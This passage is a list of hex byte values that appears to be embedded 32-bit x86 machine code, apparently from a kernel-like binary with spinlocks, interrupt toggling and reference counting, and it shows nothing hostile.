0xf5, 0x8d, 0x46, 0xc, 0x8d, 0x4c, 0x24, 0x5c, 0x51, 0x6a, 0x0, 0x50, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0xe8, 0x87, 0x87, 0xfc, 0xff, 0x83, 0xc4, 0xc, 0x83, 0x7c, 0x24, 0x10, 0x0, 0x8b, 0x44, 0x24, 0x14, 0x74, 0x5a, 0x89, 0x4, 0x24, 0xc6, 0x46, 0x8, 0x0, 0x8b, 0x54, 0x24, 0x4, 0xff, 0x4d, 0x0, 0xf, 0xb6, 0x45, 0x4, 0xc6, 0x7, 0x0, 0x75, 0x11, 0x84, 0xc0, 0x74, 0xd, 0xfb, 0xf0, 0xff, 0xa, 0xbd, 0x1, 0x0, 0x0, 0x0, 0x74, 0xd, 0xeb, 0x25, 0xfa, 0xf0, 0xff, 0xa, 0xbd, 0x1, 0x0, 0x0, 0x0, 0x75, 0x1a, 0x89, 0xf9, 0xe8, 0xbf, 0x6b, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x4, 0xf0, 0xff, 0x48, 0x4, 0x75, 0x9, 0x50, 0xe8, 0x4f, 0xd7, 0x3, 0x0, 0x83, 0xc4, 0x4, 0x8b, 0x14, 0x24, 0x89, 0xe8, 0x83, 0xc4, 0x7c, 0x5e, 0x5f, 0x5b, 0x5d, 0xc3, 0x8b, 0x40, 0x4, 0x89, 0x4, 0x24, 0xc6, 0x46, 0x8, 0x0, 0xff, 0x4d, 0x0, 0xf, 0xb6, 0x45, 0x4, 0xc6, 0x7, 0x0, 0x8b, 0x4c, 0x24, 0x4, 0x75, 0x7, 0x84, 0xc0, 0x74, 0x3, 0xfb, 0xeb, 0x1, 0xfa, 0xe8, 0x48, 0x62, 0xff, 0xff, 0x31, 0xed, 0xeb, 0xc8, 0x8d, 0x83, 0x78, 0xb0, 0xff, 0xff, 0x8d, 0x8b, 0xd5, 0x2b, 0xfe, 0xff, 0x50, 0x6a, 0x12, 0x51, 0xe8, 0x3f, 0x6a, 0x8, 0x0, 0x83, 0xc4, 0xc, 0xf, 0xb, 0x8d, 0x83, 0xe4, 0xc0, 0xff, 0xff, 0x8d, 0x8b, 0x23, 0x46, 0xfe, 0xff, 0x50, 0x6a, 0x2b, 0x51, 0xe8, 0x25, 0x6b, 0x8, 0x0, 0x83, 0xc4, 0xc, 0xf, 0xb, 0x55, 0x53, 0x57, 0x56, 0x81, 0xec, 0x9c, 0x0, 0x0, 0x0, 0xe8, 0x0, 0x0, 0x0, 0x0, 0x5b, 0x81, 0xc3, 0x65, 0x2f, 0xb, 0x0, 0x8b, 0x84, 0x24, 0xb0, 0x0, 0x0, 0x0, 0x8b, 0x48, 0x14, 0x89, 0x4c, 0x24, 0x8, 0x8b, 0x78, 0x18, 0x8b, 0x48, 0x1c, 0x89, 0x8c, 0x24, 0x80, 0x0, 0x0, 0x0, 0x8b, 0x40, 0x20, 0x89, 0x44, 0x24, 0x34, 0x8b, 0xb3, 0xc0, 0x8d, 0x10, 0x0, 0xe8, 0xc7, 0x1a, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4e, 0x8, 0x84, 0xc9, 0x74, 0xe, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0x4e, 0x8, 0x84, 0xc9, 0x75, 0xf5, 0x89, 0x7c, 0x24, 0x10, 0x8b, 0x93, 0x34, 0xff, 0xff, 0xff, 0x8b, 0xa, 0x85, 0xc9, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x42, 0x4, 0x8d, 0x41, 0x1, 0x89, 0x2, 0x8b, 0x6e, 0x34, 0x85, 0xed, 0x74, 0x7, 0xf0, 0xff, 0x45, 0x0, 0x8b, 0xa, 0x49, 0x89, 0xa, 0xf, 0xb6, 0x42, 0x4, 0xc6, 0x46, 0x8, 0x0, 0x85, 0xc9, 0x75, 0x7, 0x84, 0xc0, 0x74, 0x3, 0xfb, 0xeb, 0x1, 0xfa, 0x89, 0x54, 0x24, 0x4, 0x85, 0xed, 0xf, 0x84, 0x15, 0x5, 0x0, 0x0, 0x8d, 0x7d, 0x8, 0xe8, 0x5c, 0x1a, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4d, 0x8, 0x84, 0xc9, 0x74, 0x12, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0xf, 0x84, 0xc9, 0x75, 0xf6, 0x8b, 0x54, 0x24, 0x4, 0x8b, 0xa, 0x85, 0xc9, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x42, 0x4, 0x41, 0x89, 0xa, 0x8b, 0xb5, 0xd4, 0x4, 0x0, 0x0, 0x85, 0xf6, 0xf, 0x84, 0xea, 0x4, 0x0, 0x0, 0xe8, 0x1a, 0x1a, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4e, 0x8, 0x84, 0xc9, 0x74, 0x11, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0x4e, 0x8, 0x84, 0xc9, 0x75, 0xf5, 0x8b, 0x54, 0x24, 0x4, 0x8b, 0xa, 0x85, 0xc9, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x42, 0x4, 0x89, 0x6c, 0x24, 0xc, 0x41, 0x89, 0xa, 0xc7, 0x4, 0x24, 0xe, 0x0, 0x0, 0x0, 0x8b, 0x44, 0x24, 0x34, 0x85, 0xc0, 0x74, 0x39, 0x8d, 0x6e, 0xc, 0x6a, 0x1, 0x6a, 0x1, 0x6a, 0x8, 0x50, 0x55, 0xe8, 0x8f, 0xbf, 0x1, 0x0, 0x8b, 0x54, 0x24, 0x18, 0x83, 0xc4, 0x14, 0x84, 0xc0, 0x74, 0x1e, 0xc7, 0x4, 0x24, 0xc, 0x0, 0x0, 0x0, 0x6a, 0x1, 0xff, 0x74, 0x24, 0x38, 0x55, 0xe8, 0x11, 0xda, 0x1, 0x0, 0x83, 0xc4, 0xc, 0x84, 0xc0, 0x74, 0x6b, 0x8b, 0x54, 0x24, 0x4, 0xff, 0xa, 0xf, 0xb6, 0x42, 0x4, 0xc6, 0x46, 0x8, 0x0, 0x75, 0x7, 0x84, 0xc0, 0x74, 0x3, 0xfb, 0xeb, 0x1, 0xfa, 0x8b, 0x4c, 0x24, 0xc, 0xff, 0xa, 0xf, 0xb6, 0x42, 0x4, 0xc6, 0x7, 0x0, 0x75, 0x11, 0x84, 0xc0, 0x74, 0xd, 0xfb, 0xf0, 0xff, 0x9, 0xbd, 0x1, 0x0, 0x0, 0x0, 0x74, 0xd, 0xeb, 0x23, 0xfa, 0xf0, 0xff, 0x9, 0xbd, 0x1, 0x0, 0x0, 0x0, 0x75, 0x18, 0x89, 0xce, 0x89, 0xf9, 0xe8, 0x8e, 0x69, 0xff, 0xff, 0xf0, 0xff, 0x4e, 0x4, 0x75, 0x9, 0x56, 0xe8, 0x22, 0xd5, 0x3, 0x0, 0x83, 0xc4, 0x4, 0x89, 0xe8, 0x8b, 0x14, 0x24, 0x81, 0xc4, 0x9c, 0x0, 0x0, 0x0, 0x5e, 0x5f, 0x5b, 0x5d, 0xc3, 0xc7, 0x4, 0x24, 0x61, 0x0, 0x0, 0x0, 0x8b, 0x44, 0x24, 0x8, 0x48, 0x83, 0xf8, 0x10, 0x77, 0x84, 0xb1, 0x1, 0xc7, 0x44, 0x24, 0x8, 0x0, 0x0, 0x0, 0x0, 0x8b, 0x84, 0x83, 0xb8, 0x44, 0xfe, 0xff, 0x1, 0xd8, 0x8b, 0x54, 0x24, 0x4, 0xff, 0xe0, 0xb1, 0x1, 0xb0, 0x1, 0x89, 0x44, 0x24, 0x8, 0xeb, 0x18, 0xb0, 0x2, 0x89, 0x44, 0x24, 0x8, 0xeb, 0x10, 0xb0, 0x3, 0x89, 0x44, 0x24, 0x8, 0xeb, 0x8, 0xb0, 0x4, 0x89, 0x44, 0x24, 0x8, 0x31, 0xc9, 0xc7, 0x4, 0x24, 0x5d, 0x0, 0x0, 0x0, 0x8b, 0x6c, 0x24, 0x10, 0x4d, 0x83, 0xfd, 0x4, 0xf, 0x87, 0x38, 0xff, 0xff, 0xff, 0xb0, 0x1, 0xc7, 0x44, 0x24, 0x10, 0x0, 0x0, 0x0, 0x0, 0x8b, 0xac, 0xab, 0xfc, 0x44, 0xfe, 0xff, 0x1, 0xdd, 0xff, 0xe5, 0xb0, 0x1, 0xb2, 0x1, 0xeb, 0xc, 0xb0, 0x3, 0x89, 0x44, 0x24, 0x10, 0x31, 0xc0, 0xeb, 0x6, 0xb2, 0x2, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x54, 0x24, 0xc, 0xf, 0xb7, 0x6a, 0x40, 0x66, 0x85, 0xed, 0xf, 0x94, 0xc2, 0x8, 0xd1, 0x8b, 0x54, 0x24, 0x4, 0x75, 0x16, 0xc7, 0x4, 0x24, 0xd, 0x0, 0x0, 0x0, 0x8b, 0x4c, 0x24, 0xc, 0x66, 0x83, 0x79, 0x42, 0x0, 0xf, 0x85, 0xe1, 0xfe, 0xff, 0xff, 0x66, 0x85, 0xed, 0xf, 0x94, 0xc1, 0x8, 0xc8, 0x75, 0x16, 0xc7, 0x4, 0x24, 0xd, 0x0, 0x0, 0x0, 0x8b, 0x44, 0x24, 0xc, 0x66, 0x83, 0x78, 0x42, 0x0, 0xf, 0x85, 0xc1, 0xfe, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x8, 0x88, 0x84, 0x24, 0x88, 0x0, 0x0, 0x0, 0x8b, 0x44, 0x24, 0x10, 0x88, 0x84, 0x24, 0x89, 0x0, 0x0, 0x0, 0x8b, 0x84, 0x24, 0x80, 0x0, 0x0, 0x0, 0x89, 0x84, 0x24, 0x84, 0x0, 0x0, 0x0, 0x8d, 0x84, 0x24, 0x84, 0x0, 0x0, 0x0, 0x50, 0xe8, 0x86, 0x91, 0x2, 0x0, 0x8b, 0x54, 0x24, 0x8, 0x83, 0xc4, 0x4, 0xc7, 0x4, 0x24, 0xc, 0x0, 0x0, 0x0, 0x85, 0xc0, 0xf, 0x84, 0x7a, 0xfe, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x14, 0x2, 0x0, 0x0, 0x0, 0x8d, 0x8b, 0x58, 0xbd, 0xff, 0xff, 0x8d, 0x6c, 0x24, 0x14, 0x8d, 0x54, 0x24, 0x40, 0x51, 0x50, 0x55, 0x52, 0xe8, 0x91, 0x88, 0xff, 0xff, 0x83, 0xc4, 0xc, 0x8b, 0x44, 0x24, 0x40, 0x83, 0xf8, 0x2, 0x75, 0xc, 0x8b, 0x44, 0x24, 0x44, 0x89, 0x4, 0x24, 0xe9, 0x3f, 0xfe, 0xff, 0xff, 0x8b, 0x4c, 0x24, 0x4c, 0x8b, 0x54, 0x24, 0x44, 0x8b, 0x6c, 0x24, 0x48, 0x89, 0x84, 0x24, 0x8c, 0x0, 0x0, 0x0, 0x89, 0x94, 0x24, 0x90, 0x0, 0x0, 0x0, 0x89, 0x8c, 0x24, 0x98, 0x0, 0x0, 0x0, 0x89, 0xac, 0x24, 0x94, 0x0, 0x0, 0x0, 0x8d, 0x84, 0x24, 0x8c, 0x0, 0x0, 0x0, 0x50, 0x8d, 0x44, 0x24, 0x18, 0x50, 0xe8, 0x7f, 0xec, 0xfa, 0xff, 0x83, 0xc4, 0x4, 0x83, 0x7c, 0x24, 0x14, 0x0, 0x8b, 0x6c, 0x24, 0x18, 0x75, 0x28, 0xf0, 0xff, 0x45, 0x0, 0x6a, 0x0, 0x55, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0xe8, 0xb0, 0xd1, 0x0, 0x0, 0x83, 0xc4, 0x8, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xf8, 0x2, 0x75, 0x13, 0x89, 0xe9, 0x8b, 0x6c, 0x24, 0x18, 0xe8, 0x49, 0x5e, 0xff, 0xff, 0x89, 0x2c, 0x24, 0xe9, 0xc7, 0xfd, 0xff, 0xff, 0x8b, 0x4c, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x89, 0x54, 0x24, 0x68, 0x8b, 0x54, 0x24, 0x20, 0x89, 0x54, 0x24, 0x6c, 0x8b, 0x54, 0x24, 0x24, 0x89, 0x54, 0x24, 0x70, 0x8b, 0x54, 0x24, 0x28, 0x89, 0x54, 0x24, 0x74, 0x8b, 0x54, 0x24, 0x2c, 0x89, 0x54, 0x24, 0x78, 0x8b, 0x54, 0x24, 0x30, 0x89, 0x54, 0x24, 0x7c, 0x89, 0x44, 0x24, 0x60, 0x89, 0x4c, 0x24, 0x64, 0x6a, 0x1, 0x55, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0xe8, 0x48, 0xd1, 0x0, 0x0, 0x83, 0xc4, 0x8, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xf8, 0x2, 0x75, 0x15, 0x8b, 0x44, 0x24, 0x18, 0x89, 0x4, 0x24, 0x8d, 0x4c, 0x24, 0x60, 0xe8, 0xdc, 0x5e, 0xff, 0xff, 0xe9, 0x5d, 0xfd, 0xff, 0xff, 0x8b, 0x4c, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x89, 0x54, 0x24, 0x48, 0x8b, 0x54, 0x24, 0x20, 0x89, 0x54, 0x24, 0x4c, 0x8b, 0x54, 0x24, 0x24, 0x89, 0x54, 0x24, 0x50, 0x8b, 0x54, 0x24, 0x28, 0x89, 0x54, 0x24, 0x54, 0x8b, 0x54, 0x24, 0x2c, 0x89, 0x54, 0x24, 0x58, 0x8b, 0x54, 0x24, 0x30, 0x89, 0x54, 0x24, 0x5c, 0x89, 0x44, 0x24, 0x40, 0x89, 0x4c, 0x24, 0x44, 0x8b, 0x44, 0x24, 0xc, 0x8b, 0xa8, 0xd8, 0x4, 0x0, 0x0, 0x85, 0xed, 0xf, 0x84, 0x98, 0x1, 0x0, 0x0, 0xb0, 0x1, 0x86, 0x45, 0x8, 0x84, 0xc0, 0x74, 0xb, 0xf3, 0x90, 0xb0, 0x1, 0x86, 0x45, 0x8, 0x84, 0xc0, 0x75, 0xf5, 0x8d, 0x55, 0xc, 0x8b, 0x44, 0x24, 0x7c, 0x89, 0x44, 0x24, 0x30, 0x8b, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24, 0x2c, 0x8b, 0x44, 0x24, 0x74, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x44, 0x24, 0x70, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x44, 0x24, 0x6c, 0x89, 0x44, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x68, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x60, 0x8b, 0x4c, 0x24, 0x64, 0x89, 0x4c, 0x24, 0x18, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x4c, 0x24, 0x38, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x6a, 0x0, 0x89, 0x54, 0x24, 0x8, 0x52, 0x51, 0xe8, 0xfc, 0x81, 0xfc, 0xff, 0x83, 0xc4, 0xc, 0x83, 0x7c, 0x24, 0x38, 0x0, 0x8b, 0x44, 0x24, 0x3c, 0x74, 0x15, 0x89, 0x4, 0x24, 0xc6, 0x45, 0x8, 0x0, 0x8d, 0x4c, 0x24, 0x40, 0xe8, 0xfe, 0x5d, 0xff, 0xff, 0xe9, 0x7f, 0xfc, 0xff, 0xff, 0x89, 0x6c, 0x24, 0x8, 0x8b, 0x40, 0x4, 0x8b, 0x6c, 0x24, 0x34, 0x89, 0x45, 0x0, 0x8b, 0x44, 0x24, 0x5c, 0x89, 0x44, 0x24, 0x30, 0x8b, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x2c, 0x8b, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x44, 0x24

